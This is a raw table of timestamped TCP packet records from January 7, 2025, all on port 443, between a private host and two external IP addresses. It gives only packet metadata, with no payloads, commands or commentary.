Jan 7, 2025 04:22:07.995564938 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.000746965 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.000782967 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.000813961 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.000879049 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106031895 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106043100 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106053114 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106121063 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106127977 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106161118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106172085 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106188059 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106193066 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106204033 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106209993 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106266022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106276035 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106276035 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106285095 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106308937 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106327057 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.106337070 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106355906 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106417894 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.106468916 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.112138987 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.112204075 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.112294912 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.112349987 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.113162041 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.113214970 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.113301039 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.113362074 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.114582062 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.114639997 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.114814043 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.114945889 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.116637945 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.116708040 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.116837978 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.116880894 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.119296074 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.119343042 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.119348049 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.119360924 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.119390965 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.119452000 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.124670029 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.124742031 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.124887943 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.124953032 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.131414890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.131459951 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.131460905 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.131470919 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.131506920 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.131527901 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.148076057 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.148127079 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.148184061 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.148238897 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.148871899 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.148909092 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.148922920 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.148976088 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.150679111 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.150752068 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.150789976 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.150839090 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.151361942 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.151437044 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.151442051 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.151451111 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.151492119 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.151856899 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.151900053 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.151906013 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.151913881 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.151962042 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.151962042 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.152117014 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.152177095 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.152235031 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.152298927 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.180356026 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.180427074 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.180463076 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.180531979 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.188297033 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.188344955 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.188376904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.188407898 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.395337105 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.395402908 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.603337049 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.604010105 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.649530888 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.649544001 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649571896 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649588108 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649733067 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.649741888 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649769068 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649784088 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649934053 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.649941921 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.649959087 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.649965048 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.650034904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.825645924 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.825654984 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.825692892 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.825850010 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.825860977 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.829678059 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.901510000 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.901523113 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.901546001 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.901563883 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.901817083 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.901818037 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:08.901825905 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.901851892 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:08.901926041 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.055551052 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.055561066 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.055587053 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.055694103 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.115114927 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.115123987 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.115144968 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.115161896 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.115257978 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.115264893 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.115284920 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.115370035 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.115463972 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.323337078 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.325689077 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.350739956 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.350752115 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.350764990 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.350836039 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.350841999 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.350853920 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.350857973 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.350946903 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.350953102 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.353682041 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.489309072 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.489327908 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.489342928 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.489351988 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.489509106 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.489516973 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.489535093 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.489551067 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.489696026 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.489732027 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:09.699337959 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:09.699409008 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.104975939 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.104989052 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.105000019 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.105063915 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.105070114 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.105082035 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.105086088 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.105166912 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.105175018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.105232000 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.172959089 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.172969103 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.172997952 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.173005104 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.173149109 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.173157930 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.173171997 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.173188925 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.173253059 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.173348904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.383333921 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.383399010 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.422274113 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.422288895 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.422303915 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.422308922 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.422444105 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.497219086 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.497226954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.497242928 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.497265100 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.497406960 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.497414112 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.497464895 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.497472048 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.497522116 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.497582912 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.703346968 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.703458071 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.745666027 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.745677948 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.745696068 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.745871067 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.787554026 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.787563086 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.787580013 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.787601948 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.787774086 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.787781000 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.787796974 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:10.787869930 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.787951946 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:10.999341965 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.001698017 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.125556946 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.125567913 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.125583887 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.125655890 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.125719070 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.176645041 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.176654100 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176670074 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176693916 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176697969 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176712990 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.176721096 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176795006 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.176801920 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176814079 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.176835060 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.176896095 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.176922083 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.383337021 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.385744095 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.480586052 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.480592012 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.480608940 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.480618954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:11.480720997 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.575764894 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:11.954138994 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:13.228360891 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:13.228398085 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:13.420082092 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:13.420111895 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:13.420201063 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:13.420423985 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:13.420439959 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.648135900 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.648195982 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.648771048 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.648782015 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.648925066 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.648930073 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.986880064 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.986902952 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.986963034 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.986983061 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.986995935 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.987066984 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.987325907 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.987380981 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:14.988065958 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:14.988116980 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.209112883 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.209181070 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.209384918 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.209434986 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.209477901 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.209527016 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.210285902 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.210334063 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.210341930 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.210361958 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.210375071 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.210407019 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.248790979 CET	49742	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.248807907 CET	443	49742	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.345310926 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.345351934 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:15.345407963 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.345741987 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:15.345756054 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.576888084 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.576961040 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.577591896 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.577600956 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.577663898 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.577667952 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.907516956 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.907541990 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.907592058 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.907612085 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.907625914 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.907654047 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.907979012 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.908029079 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.908034086 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.908067942 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.908073902 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.908083916 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:16.908116102 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.908137083 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.908706903 CET	49744	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:16.908720970 CET	443	49744	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:29.979468107 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:29.979501963 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:29.979573011 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:30.006093979 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:30.006109953 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.354458094 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.354547977 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.355509996 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.355561018 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.435513973 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.435525894 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.435863018 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.435914993 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.440291882 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.483334064 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.822618008 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.822638988 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.822724104 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.822747946 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.822870016 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.822928905 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.822935104 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.824418068 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.824687958 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.824749947 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.829242945 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.829308987 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.911204100 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.911262035 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.911336899 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.911355019 CET	443	49835	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:31.911393881 CET	49835	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:31.911739111 CET	443	49835	118.178.60.9	192.168.2.4
